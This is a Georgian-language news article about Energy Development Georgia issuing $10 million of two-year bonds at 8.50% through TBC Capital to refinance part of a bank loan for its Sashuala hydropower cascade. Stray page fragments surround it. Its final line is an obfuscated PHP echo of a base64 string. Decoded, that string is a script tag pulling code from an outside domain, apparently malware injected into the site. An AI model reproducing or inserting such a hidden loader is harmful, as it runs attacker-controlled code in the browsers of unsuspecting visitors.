celsiusi
ავერსი შნაიდერი

კასკადური ელექტროსადგურების მმართველმა კომპანიამ - “ენერჯი დეველოფმენტ ჯორჯია“, თიბისი კაპიტალის დახმარებით,  10 მილიონი აშშ დოლარის ოდენობის, არაუზრუნველყოფილი და არასუბორდინირებული, 2 წლიანი ობლიგაციები გამოუშვა. შედეგად, „ენერჯი დეველოფმენტ ჯორჯია“ საქართველოს საფონდო ბირჟაზე რეგისტრირებული კომპანია გახდება.

ობლიგაციების წლიური საპროცენტო განაკვეთი 8.50%-ით განისაზღვრა.

აღნიშნული ტრანზაქცია კომპანიისა და თიბისი კაპიტალისთვის პირველი ერთობლივი განთავსებაა.

კომპანიის მიერ, ობლიგაციების ემისიის შედეგად მობილიზებული ფინანსური რესურსი საბანკო სესხის ნაწილობრივ რეფინანსირებას მოხმარდება. შესაბამისად, კომპანიის დაფინანსების სტრუქტურა უფრო მეტად დივერსიფიცირებული გახდება.

გურიაში, ჩოხატაურის მუნიციპალიტეტში, მდინარე საშუალაზე, „ენერჯი დეველოფმენტ ჯორჯიას“ ჰესების კასკადი - ჯამური დადგმული სიმძლავრით 15.25 მგვტ, თიბისის მხარდაჭერით, სამ ჰესს აერთიანებს. რიგით მესამე ჰესი - საშუალა 0, ჯამური დადგმული სიმძლავრით 2.25 მგვტ - 2023 წლის იანვარში, საშუალა 1 და საშუალა 2 კი 2019-2020 წლებში გაეშვა.

„პირველ რიგში, ვულოცავ „ენერჯი დეველოფმენტ ჯორჯიას“ ტრანზაქციის წარმატებით განხორციელებას. მნიშვნელოვანია, რომ ამ განთავსებით ფინანსური რესურსების დივერსიფიკაციასა და განვითარებაში დავეხმარეთ კომპანიას, რომელიც ქვეყანაში - განახლებადი რესურსის ეფექტურად ათვისებას, შედეგად კი, ქვეყნის ენერგოუსაფრთხოების გაუმჯობესებასა და იმპორტირებულ ენერგომატარებლებზე დამოკიდებულების შემცირებას უწყობს ხელს“, - მერი ჩაჩანიძე, თიბისი კაპიტალის მმართველი დირექტორი.

280
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");